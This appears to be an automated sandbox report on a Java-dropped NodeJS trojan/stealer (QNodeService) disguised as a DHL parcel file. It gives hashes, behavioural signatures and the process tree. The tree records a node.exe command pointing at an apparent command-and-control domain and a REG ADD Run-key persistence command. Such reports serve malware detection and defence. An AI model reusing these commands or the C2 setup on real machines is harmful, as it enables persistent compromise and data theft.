DHL PAKET(2).jar

General
Target

DHL PAKET(2).jar

Filesize

103KB

Completed

11-11-2020 07:33

Score
10/10
MD5

e299449157cf031f03fbfe79d7900d52

SHA1

d57ca0f5a6770b760f40e2be3948869ff14caa08

SHA256

fcca91752e1952ea82e9528213dcd6e063277b0df1becad05cd5071509ef6074

Malware Config
Signatures 8

Filter: none

Defense Evasion
Discovery
Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    428node.exe
    1252node.exe
    936node.exe
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Runreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\696a743c-ce03-4077-b718-d89c437a07b2 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""reg.exe
  • JavaScript code in executable

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000100000001ab93-172.datjs
    behavioral2/files/0x000100000001ab93-176.datjs
    behavioral2/files/0x000100000001ab93-180.datjs
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    22wtfismyip.com
    23wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0node.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    428node.exe
    428node.exe
    428node.exe
    428node.exe
    1252node.exe
    1252node.exe
    1252node.exe
    1252node.exe
    936node.exe
    936node.exe
    936node.exe
    936node.exe
    936node.exe
    936node.exe
    936node.exe
    936node.exe
    936node.exe
    936node.exe
  • Suspicious use of WriteProcessMemory
    java.exejavaw.exenode.exenode.exenode.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 828 wrote to memory of 1192828java.exejavaw.exe
    PID 828 wrote to memory of 1192828java.exejavaw.exe
    PID 1192 wrote to memory of 4281192javaw.exenode.exe
    PID 1192 wrote to memory of 4281192javaw.exenode.exe
    PID 428 wrote to memory of 1252428node.exenode.exe
    PID 428 wrote to memory of 1252428node.exenode.exe
    PID 1252 wrote to memory of 9361252node.exenode.exe
    PID 1252 wrote to memory of 9361252node.exenode.exe
    PID 936 wrote to memory of 2308936node.execmd.exe
    PID 936 wrote to memory of 2308936node.execmd.exe
    PID 2308 wrote to memory of 22482308cmd.exereg.exe
    PID 2308 wrote to memory of 22482308cmd.exereg.exe
Processes 7
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\DHL PAKET(2).jar"
    Suspicious use of WriteProcessMemory
    PID:828
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\0435658a.tmp
      Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain spaco110cddfdf.ddns.net
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:428
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_8lHHyj\boot.js --hub-domain spaco110cddfdf.ddns.net
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:1252
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_8lHHyj\boot.js --hub-domain spaco110cddfdf.ddns.net
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:936
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "696a743c-ce03-4077-b718-d89c437a07b2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "696a743c-ce03-4077-b718-d89c437a07b2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:2248
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • C:\Users\Admin\AppData\Local\Temp\0435658a.tmp

                      MD5

                      e299449157cf031f03fbfe79d7900d52

                      SHA1

                      d57ca0f5a6770b760f40e2be3948869ff14caa08

                      SHA256

                      fcca91752e1952ea82e9528213dcd6e063277b0df1becad05cd5071509ef6074

                      SHA512

                      e4f61b06a8b6f605478b612851ead655f984866919973a6740e417e055c20c309a81786eb3d8c99816a49abe07c009e2efa8bfd672c5e7516dfc8a8fbe23a6ba

                    • C:\Users\Admin\AppData\Local\Temp\_qhub_node_8lHHyj\boot.js

                      MD5

                      3859487feb5152e9d1afc4f8cd320608

                      SHA1

                      7bf154c9ddf3a71abf15906cdb60773e8ae07b62

                      SHA256

                      8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13

                      SHA512

                      826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • memory/428-174-0x000003088CF00000-0x000003088CF01000-memory.dmp

                    • memory/428-171-0x0000000000000000-mapping.dmp

                    • memory/936-179-0x0000000000000000-mapping.dmp

                    • memory/936-181-0x0000002BAFFC0000-0x0000002BAFFC1000-memory.dmp

                    • memory/1192-57-0x0000000000000000-mapping.dmp

                    • memory/1252-177-0x0000016F37DC0000-0x0000016F37DC1000-memory.dmp

                    • memory/1252-175-0x0000000000000000-mapping.dmp

                    • memory/2248-183-0x0000000000000000-mapping.dmp

                    • memory/2308-182-0x0000000000000000-mapping.dmp